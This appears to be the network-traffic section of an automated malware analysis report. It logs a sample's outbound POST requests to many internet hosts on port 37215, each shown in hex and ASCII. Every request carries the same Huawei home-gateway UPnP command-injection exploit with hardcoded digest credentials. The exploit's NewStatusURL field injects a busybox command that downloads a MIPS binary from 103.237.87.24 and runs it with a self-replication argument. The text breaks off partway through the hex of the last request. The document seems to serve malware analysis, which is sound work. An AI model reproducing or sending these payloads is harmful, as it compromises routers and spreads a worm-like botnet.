                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2236192.168.2.134551241.178.196.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.600055933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2237192.168.2.133977441.207.41.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.600138903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2238192.168.2.1337576184.227.247.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.600174904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2239192.168.2.134945441.146.167.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.600205898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2240192.168.2.1336706223.11.194.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.600240946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2241192.168.2.135215241.29.188.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.600507021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2242192.168.2.1336660157.118.86.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.600569010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2243192.168.2.135154841.211.178.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.600630999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2244192.168.2.134291041.184.211.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.600672960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2245192.168.2.1335524207.144.105.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.601270914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 